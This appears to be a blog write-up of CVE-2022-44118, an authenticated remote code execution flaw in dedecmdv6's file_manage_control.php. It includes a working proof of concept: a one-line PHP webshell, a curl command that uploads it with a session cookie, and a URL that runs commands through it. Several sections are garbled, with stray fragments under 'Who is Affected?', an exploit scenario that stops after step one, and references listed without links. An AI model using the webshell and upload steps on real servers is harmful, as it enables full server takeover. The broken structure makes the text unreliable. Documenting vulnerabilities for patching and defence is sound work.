CVE-2022-44118 - Remote Code Execution in dedecmdv6 v6.1.9 via file_manage_control.php

dedecmdv6 is a background management tool built for the DedeCMS content management system, widely used in China. In late 2022, a critical vulnerability—CVE-2022-44118—was discovered in version 6.1.9 of dedecmdv6. This bug allows any authenticated user to execute arbitrary PHP code remotely through the file_manage_control.php file. Below, we'll break down how this vulnerability works, include a sample exploit, and link out to original references.

What is CVE-2022-44118?

CVE-2022-44118 describes an authenticated Remote Code Execution (RCE) vulnerability in dedecmdv6 v6.1.9, specifically through unsafe file operations in file_manage_control.php. If an attacker can log in, they can upload or edit files to inject and execute malicious PHP code on the server.

Why Does This Happen?

The root cause lies in improper input validation and insufficient permission checks within file_manage_control.php. The file management functions let users upload, edit, and save files directly on the server, but fail to block dangerous file types (like .php) or strip harmful content.

Here’s a simple logic flow from the source

// file_manage_control.php (simplified)
/**
* File upload handler
*/
if(isset($_FILES['uploadfile'])){
    $dest = $_POST['path'] . basename($_FILES['uploadfile']['name']);
    move_uploaded_file($_FILES['uploadfile']['tmp_name'], $dest);
    // No checking for file type or extension!
}

Who is Affected?

- Product: dedecmdv6 (https://dedecmd.com/)

Upload or download files

- Move laterally within the server/network

Real Exploit Scenario

1. Log into dedecmdv6 (either with stolen/default credentials, or by creating a new low-privilege account if possible)

Proof of Concept (PoC): How the Exploit Works

Below is a step-by-step example and code snippet for exploitation.

Sample Webshell (webshell.php)

<?php echo shell_exec($_GET["cmd"]); ?>

Exploit with curl (Linux command line)

curl -s -L -b "PHPSESSID=your_session_cookie" \
     -F "uploadfile=@webshell.php" \
     -F "path=/var/www/html/dedecms/uploads/" \
     http://target-site/dedecms/file_manage_control.php

Open your browser and visit

http://target-site/dedecms/uploads/webshell.php?cmd=whoami

You will see the output of the whoami command, meaning the webshell is working.

Original References

- CVE Details Entry
- dedecmdv6 Official Site
- ExploitDB Writeup  
- Seebug Advisory (Chinese)

Conclusion

CVE-2022-44118 is a serious threat for anyone running vulnerable versions of dedecmdv6. With simple steps, an attacker can take full control of your server. Patch or upgrade your dedecmdv6 installation _immediately_, and always follow best security practices.

Timeline

Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:44:00 UTC